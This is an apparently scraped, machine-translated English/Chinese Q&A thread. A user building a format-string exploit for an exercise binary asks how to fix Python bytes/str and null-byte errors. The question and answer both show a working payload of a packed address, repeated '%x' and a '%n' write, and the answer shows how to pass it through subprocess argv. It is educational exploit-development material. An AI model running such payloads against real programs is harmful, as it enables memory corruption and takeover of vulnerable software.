[英]“must be a string without null bytes” or “can't concat str to bytes” passing a payload on a command line
I am trying to create an exploit for an exercise but I have a problem with the following code:我正在尝试为练习创建一个漏洞利用,但我对以下代码有疑问:
#!/usr/bin/python
import os
import struct
address = struct.pack("I",0x201014)
payload = address+"." + ".%x."*131 + ".%n."
os.system("/home/osboxes/Desktop/formatString " + payload)
But the mistake is as follows: TypeError: system() argument 1 must be string without null bytes, not str但错误如下: TypeError: system() argument 1 must be string without null bytes, not str
I am trying to upgrade to the current version of python with "subprocess" utility:我正在尝试使用“子进程”实用程序升级到 python 的当前版本:
#!/usr/bin/python3
import subprocess
import struct
address = struct.pack("I",0x201014)
payload = address+"." + ".%x."*131 + ".%n."
subprocess.call("/home/osboxes/Desktop/formatString " + payload, shell=True)
But the mistake is as follows: TypeError: can't concat str to bytes但是错误如下: TypeError: can't concat str to bytes
How could I fix the byte or str conversion problem for both versions?如何解决两个版本的字节或字符串转换问题? both programs agree that the error is in the line of "payload =..."
两个程序都同意错误出现在“payload = ...”行中
That string isn't capable of being passed as a command-line argument on UNIX.该字符串不能作为 UNIX 上的命令行参数传递。
Why?为什么? Because it contains NUL literals, and UNIX command lines are made up of C strings -- which are NUL-terminated.
因为它包含 NUL 文字,并且 UNIX 命令行由 C 字符串组成——这些字符串都是以 NUL 结尾的。
>>> address = struct.pack("I",0x201014)
>>> address
b'\x14\x10 \x00'
See that \x00
?看到
\x00
了吗? Not allowed, not possible -- not as one command-line argument, at least.不允许,不可能——至少不能作为一个命令行参数。
But you can put it in an argv, as long as it's split into multiple arguments.但是你可以把它放在一个argv中,只要它被分成多个arguments。 Note that
shell=False
below:请注意下面的
shell=False
:
payload = (address + (b'.%x.' * 131) + b'.%n.').split(b'\0')
subprocess.call(['/home/osboxes/Desktop/formatString'] + payload)
How does this work?这是如何运作的? Because the
\x00
s that terminate each individual C string are implicitly present at the boundary points.因为终止每个单独的 C 字符串的
\x00
s 隐式存在于边界点。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.